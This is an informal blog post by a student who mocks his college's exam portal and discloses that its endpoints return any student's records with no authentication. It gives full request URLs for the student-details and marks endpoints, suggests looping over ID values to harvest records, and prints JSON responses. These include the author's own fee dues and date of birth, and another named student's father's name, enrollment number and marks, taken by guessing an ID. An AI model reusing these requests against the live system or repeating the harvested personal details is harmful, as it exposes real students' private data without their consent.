Hey guys I am Tejas Lamba of B. Tech AIML 237036, today we got a message in our whatsapp group that we can check our sessional marks online
I’m chilling when our class WhatsApp group lights up with a message saying we can check our sessional marks online. Online? In 2025? SAITM finally entering the digital age? I was hyped, like a kid unwrapping a shiny new toy
Buckle up, because this backend, brought to you by the "geniuses" at Sonet Microsystems Pvt. Ltd., is a dumpster fire of code, security holes, and typos that’ll make you question humanity.
Yeah them 
I fired up the URL: https://erp.saitm.ac.in/InternalExam/internalExaminationMarks. The UI? Imagine a 90s Geocities page had a baby with a spreadsheet and forgot to teach it manners. Basic input fields, a captcha (lol, we’ll get to that), and a “Submit” button that screams, “I was designed in Microsoft Paint.”
I entered my details and the story starts, and yes am blurrring my birthday I dont want extra wishes but thank you
and noticed something glorious. The captcha? You can copy and paste it into the input field. Like, what’s the point, SAITM? It’s like putting a lock on a door but taping the key to the handle. Why even bother? I’m begging you, Sonet Microsystems, explain this to me like I’m five.
Well if we ignore that lets move forward, So we hit "Submit" and let the magic begin (after this its all techy stuff so sorry for boring you guys out)
Now ya'll be asking me "What This Code Tries to Do?" Lemme explain in a nutshell
This function, LoadCheckIsValidData, it takes a RollNO and DatyeOFBirth (yes, that’s a typo on their end I belive, and we’ll get to it), sends them to a server via an AJAX GET request, and checks if they’re valid. If they are, it does some bizarre captcha check and maybe triggers an OTP button click. If not, it slaps an error message on the screen. Think of it as a digital gatekeeper who’s bad at spelling and has a questionable sense of logic. I won't bore you with the details but here are all the funny things I found
- DatyeOFBirth, “Captche”, “Does not Matched”. It’s like the developer was typing with boxing gloves.
- Freezing the browser is a cardinal sin. Use modern async patterns.
- JSON.parse and AJAX errors are ignored, risking crashes.
- Hardcoded Everything: URLs, error messages, and magic strings are hardcoded, making maintenance a nightmare.
- Comparing .html() to .val() for captcha? Triggering .click()? This is duct-tape programming.
- Vague Naming: param1, param2, a, Data1, cacheInval—it’s like the developer hated clarity.
- Debugger in Prod, Leaving debugger in is a rookie mistake that screams, “I didn’t test this.”
- Errors are barely communicated, leaving users in the dark.
Anyways some people with come at me with "Well if it works don't touch it" Yeah it does work, but how? Horribly
Lets move ahead in our route of missery
I let this function run and and it calls another function named GetStudentDetailsData, let's dive into the mediocrity of this function
The GetStudentDetailsData function is like a clueless librarian who hands out private student records to anyone who asks. It takes a regNo (registration number, supposedly), makes a POST request to a server, and fetches sensitive details like a student’s name, photo, date of birth, and even their dad’s name (because, sure, that’s critical).
Lets ignore the two debugger statements and all the hard coding but mainly focus on something thats GOD
- It fetches student details via a POST request (why POST? It’s just fetching data! Should be GET but again It's her choice).
This function is a globally exposed JavaScript function, meaning anyone can open the browser console and type GetStudentDetailsData(123), GetStudentDetailsData(124), or any value to probe for student data. If the server doesn’t validate permissions either (and given this frontend’s quality, I’m not holding my breath), this is a massive data breach. You’re exposing:
- Student names
- Dates of birth
- Photos
- Father’s names
- Departments, programs, semesters
This is PII (personally identifiable information) that could violate privacy laws like GDPR, CCPA, or FERPA. A malicious user could script a loop to try thousands of regNo values, harvesting data like a digital vacuum cleaner. It’s like leaving the school’s database on a public Google Drive with the password “password123.”
Now here’s where the plot thickens, or rather, completely unravels we send a POST request (because GET is too mainstream I guess) to
https://erp.saitm.ac.in/OnlineFeePayment/GetStudentDetailsData?AdmissionNo=237036&Schoolid=-1&optMode=GetStudentDetailsData…and what do we get?
{
"Table": [
{
"AdmissionID": 715,
"StudentId": 3639,
"AdmissionNo": "237036",
"RegId": 715,
"SchoolID": 1,
"DepartmentID": 11,
"ProgramID": 4,
"BatchID": 4,
"CurSemID": 4,
"StudentName": "TEJAS LAMBA",
"FatherName": "PRAVEEN SINGH LAMBA",
"SchoolName": "ST. ANDREWS INSTITUTE OF TECHNOLOGY & MANAGEMENT",
"ProgramName": "BACHELOR OF TECHNOLOGY (AIML)",
"Department": "EMERGING TECHNOLOGY",
"BatchName": "2023-27",
"Semester": "Semester-4",
"FileUrl": null,
"DateOfBirth": "22/02/2006"
}
],
"Table1": [
{
"TotalDues": 195625.00,
"CreditNote": 0.00,
"Paid": 0.00,
"Concession": 0.00,
"Scholorship": 0.00,
"Balance": 195625.00
}
]
}
Yes, you read that right. Not just my name and DOB, but my dad’s name, my course, semester, and the cherry on top my fee dues (yes, they really aired out my broke status too 💀).
Also, spot the typo in "Scholorship", I guess spelling wasn’t a priority while exposing my entire academic identity like it’s a Facebook birthday post.
This ain't an API, it’s a leak disguised as a feature. Bravo, Sonet Microsystems, you've achieved the impossible turning a fee portal into a public biography.
Now it calls another function in the same process named GetInternalResultData
What This function do? Pretends to Do
GetInternalResultData is like a shady vendor at a flea market, peddling student exam results to anyone who tosses it a regNo. It makes a GET request to a server, grabs a pile of exam data, and tries to build a table in the DOM to display it. If it works, you get a table with semesters, evaluation parameters, and buttons to view results. If it fails, it slaps a vague error message on the screen. But here’s the kicker: it’s wide open.
We have our friend debugger; again in production code lmao, it’s a sign of sloppy development and zero cleanup. But we have progress guys dw it’s a GET request (yay, finally not freezing the browser with async: true!)
The main part ya'll waiting for
Like its predecessors, GetInternalResultData is a global function with no authentication. You can open the console and type GetInternalResultData(123) to fetch exam results for any student, exposing:
- Semesters
- Evaluation parameters
- Student IDs (in button IDs/values)
- Exam types
Since it’s a GET request, it’s even easier to exploit. Just craft a URL like:
https://erp.saitm.ac.in/InternalExam/LoadInternalExamResultView?AdmissionNo=123&SessionId=-1&SchoolId=-1&DepartmentId=-1&ProgramId=-1&SemesterID=-1&ExamType=-1&ExamName=-1&optMode=GetMarksDataand you can hit the endpoint directly. This is a data breach on steroids, violating privacy laws (GDPR, FERPA, CCPA) and exposing sensitive academic data to anyone with a browser. It’s like posting exam scores on a public billboard with students’ IDs attached.
Now for the part I was hyped about hitting that sketchy GET endpoint directly:
https://erp.saitm.ac.in/InternalExam/LoadInternalExamResultView?AdmissionNo=237036&SessionId=-1&SchoolId=-1&DepartmentId=-1&ProgramId=-1&SemesterID=-1&ExamType=-1&ExamName=-1&optMode=GetMarksData
I opened that in the browser, and guess what I got?
{
"Table": [
{
"StudentID": 3639,
"Semester": "Semester-4",
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4
},
{
"StudentID": 3639,
"Semester": "Semester-4",
"EvaluationParameter": "ASSIGNMENT",
"ExamType": 5
},
{
"StudentID": 3639,
"Semester": "Semester-4",
"EvaluationParameter": "QUIZ/ CLASS TEST",
"ExamType": 6
},
{
"StudentID": 3639,
"Semester": "Semester-4",
"EvaluationParameter": "ATTENDANCE",
"ExamType": 7
}
]
}
Now guys I know what you think, "Tejas there isn't something intresting here?", well well well progress is progress
Now after this I won't show you guys how I got this but you're free to find this on your own, whenw e go to the URL
https://erp.saitm.ac.in/InternalExam/GetResultViewData?optMode=GetStudentMarksData&StudentId=3639&ConductionId=4 Make a POST request please because again these guys are idiots and they don't understand why we use POST and GET
We get my full fledged marks of sessionals
{
"Table": [
{
"imgUrl": "\\img\\IT.png",
"StudentId": 3639,
"EnrollmentNo": "237036",
"StudentName": "TEJAS LAMBA",
"SchoolName": "ST. ANDREWS INSTITUTE OF TECHNOLOGY & MANAGEMENT",
"fatherName": "PRAVEEN SINGH LAMBA",
"Department": "EMERGING TECHNOLOGY",
"Program": "BACHELOR OF TECHNOLOGY (AIML)",
"Semester": "Semester-4",
"FileUrl": "",
"BatchID": 4,
"SchoolID": 1,
"DepartmentID": 11,
"ProgramID": 4
}
],
"Table1": [
{
"StudentID": 3639,
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4,
"SubjectName": "Computer Networks",
"SubjectCode": "PCC-CSE-303G",
"ExamDate": "19 Mar 2025",
"MaxMarks": 30.00,
"MarksObtained": 7.00
},
{
"StudentID": 3639,
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4,
"SubjectName": "Design & Analysis of Algorithms",
"SubjectCode": "PCC-CSE-307G",
"ExamDate": "20 Mar 2025",
"MaxMarks": 30.00,
"MarksObtained": 12.00
},
{
"StudentID": 3639,
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4,
"SubjectName": "DISCRETE MATHEMATICS",
"SubjectCode": "PCC-CSE-202G",
"ExamDate": "18 Mar 2025",
"MaxMarks": 30.00,
"MarksObtained": 2.00
},
{
"StudentID": 3639,
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4,
"SubjectName": "Introduction to Machine Learning",
"SubjectCode": "PCC-AIML-241G",
"ExamDate": "18 Mar 2025",
"MaxMarks": 30.00,
"MarksObtained": 10.00
},
{
"StudentID": 3639,
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4,
"SubjectName": "OPERATING SYSTEM",
"SubjectCode": "PCC-CSE-206G",
"ExamDate": "20 Mar 2025",
"MaxMarks": 30.00,
"MarksObtained": 9.00
},
{
"StudentID": 3639,
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4,
"SubjectName": "UNIVERSAL HUMAN VALUE ETHICS",
"SubjectCode": "MC-UHV-II",
"ExamDate": "21 Mar 2025",
"MaxMarks": 30.00,
"MarksObtained": 10.00
}
]
}(Yes you can laugh at my marks while I laugh at your career coz this college can't get you placed)
Now just to verify if this can work for anyone we take a random number (4 digit), lets say 3500 and put this as my studentID, lets see what we get
{
"Table": [
{
"imgUrl": "\\img\\IT.png",
"StudentId": 3500,
"EnrollmentNo": "233189",
"StudentName": "HARSHIT SINGH RAUTELA",
"SchoolName": "ST. ANDREWS INSTITUTE OF TECHNOLOGY & MANAGEMENT",
"fatherName": "MAHENDRA SINGH RAUTELA",
"Department": "COMPUTER SCIENCE & ENGINEERING",
"Program": "BACHELOR OF TECHNOLOGY (CSE)",
"Semester": "Semester-4",
"FileUrl": "",
"BatchID": 4,
"SchoolID": 1,
"DepartmentID": 10,
"ProgramID": 15
}
],
"Table1": [
{
"StudentID": 3500,
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4,
"SubjectName": "DISCRETE MATHEMATICS",
"SubjectCode": "PCC-CSE-202G",
"ExamDate": "18 Mar 2025",
"MaxMarks": 30.00,
"MarksObtained": 15.00
},
{
"StudentID": 3500,
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4,
"SubjectName": "ENVIRONMENTAL SCIENCES",
"SubjectCode": "MC-106G",
"ExamDate": "21 Mar 2025",
"MaxMarks": 30.00,
"MarksObtained": 0.00
},
{
"StudentID": 3500,
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4,
"SubjectName": "OBJECT ORIENTED PROGRAMMING",
"SubjectCode": "PCC-CSE-208G",
"ExamDate": "19 Mar 2025",
"MaxMarks": 30.00,
"MarksObtained": 25.00
},
{
"StudentID": 3500,
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4,
"SubjectName": "OPERATING SYSTEM",
"SubjectCode": "PCC-CSE-206G",
"ExamDate": "20 Mar 2025",
"MaxMarks": 30.00,
"MarksObtained": 13.00
},
{
"StudentID": 3500,
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4,
"SubjectName": "UNIVERSAL HUMAN VALUE ETHICS",
"SubjectCode": "MC-UHV-II",
"ExamDate": "21 Mar 2025",
"MaxMarks": 30.00,
"MarksObtained": 22.00
},
{
"StudentID": 3500,
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4,
"SubjectName": "WEB TECHNOLOGIES",
"SubjectCode": "PCC-CSE-210G",
"ExamDate": "18 Mar 2025",
"MaxMarks": 30.00,
"MarksObtained": 20.00
},
{
"StudentID": 3500,
"EvaluationParameter": "SESSIONAL 1",
"ExamType": 4,
"SubjectName": "ORGANIZATIONAL BEHAVIOUR",
"SubjectCode": "HSMC-02G",
"ExamDate": "20 Mar 2025",
"MaxMarks": 30.00,
"MarksObtained": 24.00
}
]
}I got another student’s full details and marks. Name, father’s name, grades, everything. It’s like SAITM built a public database and called it a portal.
This portal is a masterclass in how not to build a web app. No authentication, hardcoded URLs, typos that hurt my soul, and enough PII leaks to make a lawyer’s head spin. Sonet Microsystems, take a bow you’ve turned a simple exam portal into a privacy apocalypse. SAITM, maybe next time hire developers who know what “security” means.
To my fellow students: check your marks, but maybe don’t trust this portal with your data. To the admins: fix this before someone turns your database into a Reddit thread. And to Sonet Microsystems: I’d say “do better,” but at this point, just… do something.
Peace out, Tejas Lamba, AIML 4th Semester
Update: I tried contacting Sonet microsystems on their email and here is what I get
https://sonetmicrosystems.com/support/